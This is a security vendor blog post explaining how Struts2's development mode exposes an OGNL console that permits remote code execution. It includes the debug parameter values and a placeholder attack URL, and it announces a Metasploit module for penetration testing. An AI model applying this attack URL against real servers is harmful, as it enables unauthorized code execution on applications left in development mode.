Leading SAP AG partner in discovering and solving security vulnerabilities                                 Request DEMO             
struts2Logo-8612_200x199

Struts2 DevMode RCE with Metasploit module

Struts2 is a very powerful and popular Java framework. It is widespread, being used in many large and less large enterprise applications. This summer, a critical vuln was found in Struts2. It was an OGNL injection which led to RCE. It is simple, requires no auth, and works against almost all versions (except the latest one).

When the advisory was published, there were a lot of attacks against unpatched systems in the Internet.

That was incredible.

But this vuln was not the first one. Some very similar OGNL injections had been found within the last three years. But only one of them attracted my attention when I dove deeper into this area. Because this is not a bug but rather a feature. Therefore, it will not be corrected.

I’m talking about the Development mode.

Development mode is a special feature which provides some comfortable ways to debug applications. You can simply switch it on for any of your applications by just setting the parameter “struts.devMode” to “True” in struts.xml (<constant name="struts.devMode" value="true" />).

If you want to use it, you can write the “debug” parameter in URL for any servlet. The parameter may take one of these profitable values:

  1. xml – shows a lot of information about servlet and environment (good information disclosure)
  2. console – shows a new windows which gives us the opportunity to input any OGNL expression! (like a web debugger)

Yes, yes! We can perform an OGNL expression and have RCE for any apps where DevMode is on.

“Console” doesn’t always work as expected. But when we type a command in the “console”, it sends the OGNL expression in the “expression” parameter and with “debug=command”. Something like this:

http://127.0.0.1:8080/struts2-mailreader/Registration_input.do?debug=command&expression=ognl_expression

It is also worth mentioning that DevMode is switched off by default, and official documentation says that it must be switched off when you move your app from dev to production.

But in practice, we had such cases during our pentests. In addition, Struts2 servlet examples have DevMode on by default.

So, if you conduct a pentest against Struts2 apps, this may be a very useful attack vector.

By the way, this attack may be well known by some guys. But the main goal of this post is to explain the idea of the attack and present a module for Metasploit Framework.

I thank Renaud Dubourguais, from whose article I knew about the attack.

Alexey Tyurin (@antyurin)